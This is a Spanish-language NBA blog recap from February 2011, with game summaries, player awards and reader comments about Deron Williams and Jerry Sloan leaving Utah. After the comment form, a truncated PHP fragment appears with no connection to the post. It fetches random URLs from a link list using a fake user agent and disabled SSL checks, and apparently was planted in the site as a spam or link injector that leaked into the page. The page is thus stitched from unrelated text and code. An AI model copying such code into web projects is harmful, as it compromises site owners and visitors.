La Crónica (11/02/2011)

12 de February de 2011 por TheDeerHunter

A la 27ª fue la vencida y los Cavs rompen su nefasta racha frente a los Clippers, casualmente en la vuelta al frente de Mo Williams. Algunos de nuestros contertulios demostraron su audacia confiando en que esto llegaría pronto. Lo lograron de manera brillante porque, al contrario de lo que se pueda pensar, estos Clippers no se lo ponen fácil a casi nadie. Y tuvieron que sudar más de lo debido, ya que los árbitros dieron por ilegal un tapón bastante dudoso de Hickson a Baron Davis en el último segundo. Él es uno de los jugadores que pueden salir muy reforzados emocionalmente de esta crisis. En la prórroga fue Antawn quién desniveló la balanza ganándole por la mano al mismísmo Griffin. Por fin termina este fatídico capítulo. A ver cuanto dura la próxima.

Mientras los Lakers poquito a poquito van recortando su desventaja. Anoche ganaron brillantemente en el Madison en uno de esos partidos que hace Kobe cuando visita la Gran Manzana. Mientras los Spurs hacían un partido infame en Philadelphia. Los Heat no fallaron en Detroit terminando 6 hombres en dobles figuras y aumentan su ventaja respecto a Orlando que volvieron a fallar en casa contra los Hornets.

Si teníamos curiosidad por qué es lo que iba a hacer Utah en su recién estrenada horfandad, pues les dieron para el pelo. Para llorar que Robin&Warrick te destrocen por dentro y Sloan lloraba, pero de la risa con la que antaño fue su defensa. Deron lo disfrutó rozando el triple doble. Que lo siga disfrutando.
Los Suns aprietan y también los Grizzlies asegurando un partido difícil contra los Bucks sin contar con Zach Randolph. Importante contribución de Conley y Sam Young en un gran duelo doble contra Jennings y Salmons.
Los Blazers, sin embargo, no se mostraron muy presionados. Rudy masacró desde el triple comenzando con un 6 de 6 al que luego cogió el testigo LaMarcus en otro de esos partidos que dejan en evidencia a más de uno. Los Raptors es que son una madre de rival.

En el Este los Pacers ganaron a Minnesotta, con una segunda unidad que no sabía que tenía O’Brien, y expulsan a los Bobcats de la 8ª plaza. A éstos se les ha pasado el efecto del nuevo técnico y Jordan ahora baja a “patearles el culo” en los entrenamientos a ver si espabilan. Anoche derrota en casa contra los Nets, donde Brook Lopez nos deslumbró con nada menos 11 rebotes. Debería haberse guardado alguno para otro día.

PREMIOS

MVP: Kobe deslumbró como nos tiene acostumbrados siempre que visita Nueva York, pero por presión y relevancia me quedaría o con LaMarcus Aldridge (37 puntos, 10 rebotes, 2 asistencias) o con Antawn Jamison (35 puntos, 9 rebotes, 4 asistencias). El de los Cavs se partía la cara ante Griffin, así que el premio es para él.

Rookie: No sirvió para ganar pero ningún otro rookie se acercó lejanamente a sus guarismos. 32-13 más 2 asistencias y 2 robos para el Animal.

Sorpresa: Se la tenemos que dar a Brook Lopez y sus “inmensos” 11 rebotes. Dicen las malas lenguas que está tocado para el siguiente partido porque casi se hernia en el esfuerzo (es coña, ojo) Además anotó 31 puntos. Son los números que deberíamos esperar de él.

Decepción: Los Jazz y en especial Al Jefferson comido vivo por Robin Lopez. Menudo partidito nos hizo DJ Augustin también.

Esfuerzo en vano: 19 puntos, 14 asistencias, 8 rebotes para Deron Williams, libre como el sol de la mañana. No sé porqué me da en la nariz que empezaremos a verle a menudo en esta categoría.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. baruc dice:
    #1

    Me parece que estas haciendo un ataque demasiado duro contra Deron… esto empieza a parecer Marca con Pellegrini

      Citar

  2. sayim dice:
    #2

    A mi, en cambio, me parece que está siendo demasiado comedido… Se están perdiendo los pocos valores que quedaban en la NBA. Si Deron ya no era santo de mi devocción, ahora lo será todavía menos. Debería aprender de otros bases, especialmente del oeste, que sí hacen realmente mejores a sus compañeros y dejan en segundo plano su lucimiento personal… Y en la franquicia tampoco se pueden ir de rositas, ¿que se les pasa por la cabeza? Como puedes tener dudas entre un entrenador con ese currículo y un jugador que, ni siquiera, está entre los 10 mejores de la NBA

    Ojalá se queden sin PO

      Citar

  3. HisRoyalAirness dice:
    #3

    Yo creo que la franquicia a pensado que soportaaría mejor, economicamente supongo, la marcha de Sloan que la de Deron. Creo que a medio plazo no va a ser así y se van a joder por cenutrios.
    Para mí Deron es un crack, si no es un top 10 casi, pero es un verdadero gilipoyas y un irrespetuoso. En la NBA de antes tenías que ganarte el respeto y la mayoría lo hacían calladitos, agachando las orejas y hablando en la cancha. Yo desde que vi a Bynum de rookie pegarle aquel empujón a Shaquille después de haberle anotado en la cara he perdido mucha fè en el valor que se supone que ha de tener la historia.
    Demasiado afán de protagonismo de muchos niñatos.

      Citar

  4. M dice:
    #4

    ¿Y ahora qué hacemos los que éramos seguidores de los jazz, aunque fuera desde la distancia y sin un fervor extremo?. Aaaayyyy que vida más triste. Creo que seguiré apoyándolos, pero lo de este chico ha sido una gambada…de la que se arrepentirá mucha más gente que él. Que cafrada, madre. El propietario de los Cavs ya tendrá el karma mejor, que le pase un poco a Deron, rima.

      Citar

  5. Rompe dice:
    #5

    Parecía que este año iba a ser diferente pero no, es incluso peor! El 6º de la conferencia este tiene peor record que el 10º del oeste… manda huevos!

      Citar

  6. kantonyo dice:
    #6

    Vaya taponazo que le hizo Hickson a Griffin que acabó en el suelo sin saber que había pasado…

      Citar

  7. MagicJohnson32 dice:
    #7

    Si no lo habéis visto, no os perdáis el alley oop de Shannon Brown: http://www.youtube.com/watch?v=fQbPyHuWByo

      Citar

  8. Busky23 dice:
    #8

    Tristemente esta es la realidad del deporte actual,tengo ganas de ver la reacción del publico de Salt Lake City.
    En la temporada 80-81 Magic Johnson consiguió que echaran a Paul Westhead en detrimento de Pat Riley,en su día Magic fue muy criticado por eso pero ya sabemos como acabo la historia,llegaron muchas victorias y anillos y nadie se acuerda.
    En el caso de Utah la transición no sera tan fácil,el equipo salvo milagro va a ir de mal en peor,la gente empezara a calentarse cada vez más y ya veremos como acabara esto.
    Nunca me hubiera imaginado que una franquicia a la que yo considero seria llegara a tal punto con un entrenador que a veces con más y otras veces con menos siempre a mantenido al equipo en playoffs (excepto la 2004,y se quedaron fuera por poco) tras 23 temporadas.

    Muy bien Lakers,el toque de Kobe a Gasol parece que le ha echo espabilar.

      Citar

  9. HisRoyalAirness dice:
    #9

    Sí Busky23 pero es que Deron no es Magic Johnson. El año que Magic tuvo el problema con Westhead ya había sido MVP de las finales y ganado un anillo (jugando aquel sexto partido legendario de los 42-15-7-3) y el año que por su culpa echaron al entrenador su respuesta a los abucheos de la grada fue ganar otro anillo siendo de nuevo MVP. No creo que a los aficcionados de Salt Lake City les sirva esa comparación.

      Citar

  10. Rompe dice:
    #10

    Hombre, yo no creo que haya que echarle toda la culpa a Deron. Él podrá jugar como quiera y decir lo que se le pase por la cabeza. Eso al fin y al cabo lo hacen todos. La cosa es que haya una cabeza pensante del equipo que le haga caso, ahí está el problema…

      Citar

  11. Tweets that mention La Crónica (11/02/2011) | tjnba.com -- Topsy.com dice:
    #11

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>